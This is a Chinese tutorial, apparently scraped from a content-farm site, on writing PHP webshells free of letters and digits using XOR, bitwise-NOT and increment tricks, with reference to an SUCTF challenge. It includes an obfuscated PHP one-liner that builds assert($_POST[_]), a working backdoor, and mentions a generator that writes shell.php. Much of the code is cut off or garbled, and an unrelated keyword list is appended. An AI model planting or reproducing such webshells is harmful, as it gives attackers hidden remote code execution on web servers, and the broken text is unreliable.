如何实现不包含数字字母的WebShell
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,小编给大家分享一下如何实现不包含数字字母的WebShell,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!一、使用异或 ^ 运算
千家信息网最后更新 2025年12月01日如何实现不包含数字字母的WebShell一、使用异或
小编给大家分享一下如何实现不包含数字字母的WebShell,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!
一、使用异或 ^ 运算
这个马是不能直接用的,因为代码中的url编码其实对应的是一个不可打印的特殊字符,这里只是为了显示程序方便,作者用url编码来取代,实际上木马应该是下面这个样子:
或者你还可以按照如下两种形式修改木马,使得木马可以运行。
二、使用取反
~运算'>'<')+('>'>'<');$_=$__/$__;$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});$_=$$_____;$____($_[_]);// assert($_POST[_]);前两天的SUCTF就考察了这个,但是需要对代码稍作修改。原题目可以写入特殊字符只有:
~ $ _ ; = ( ),修改如下:(PS:代码由Wfox师傅fuzz出来,也是参考P牛的文章 )fuzz脚本如下:
'; }?>赛后官方也提供了WP,PHP中使用按位取反(~)函数创建后门 。按照这篇文章,没有成功生成可用的shell,于是我又参考了另外一篇文章 Deformity PHP Webshell、Webshell Hidden Learning ,生成脚本如下:
# generate.php 运行该程序,生成木马shell.php, assert('eval($_POST[_])');')?>三、使用自增运算
++看完了这篇文章,相信你对"如何实现不包含数字字母的WebShell"有了一定的了解,如果想了解更多相关知识,欢迎关注行业资讯频道,感谢各位的阅读!
木马
篇文章
生成
代码
字符
运算
字母
数字
特殊
程序
编码
脚本
参考
运行
成功
作者
函数
只是
只有
后门
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
数据库禁止添加重复数据语句
帝国后台数据库配置
抢购软件开发不同浏览器
阿坝网络安全宣传周
风电场开展网络安全自查
数据库怎么调换列的顺序
数据库中英文文献
百度网络安全备案号
软件开发的工作怎么样
花网络安全插画临摹
接口是写在数据库吗
html5 远程数据库
长春电子工程师软件开发
网络技术直招士官考什么
大数据仓库用的是什么数据库
熵体网络技术上海有限公司
电子商务数据库技术课程总结报告
校园网络安全与保护工作总结
火车头数据库发布教程
云服务器可以开私服吗
长扬科技网络安全
普陀区质量软件开发优化价格
网络工程加软件开发
市政府网络安全保密局
山西太原软件开发工资标准
国外服务器跑分网站
数据库怎么把行装成咧
sql数据库提示错误
河池软件开发技术
imei手机数据库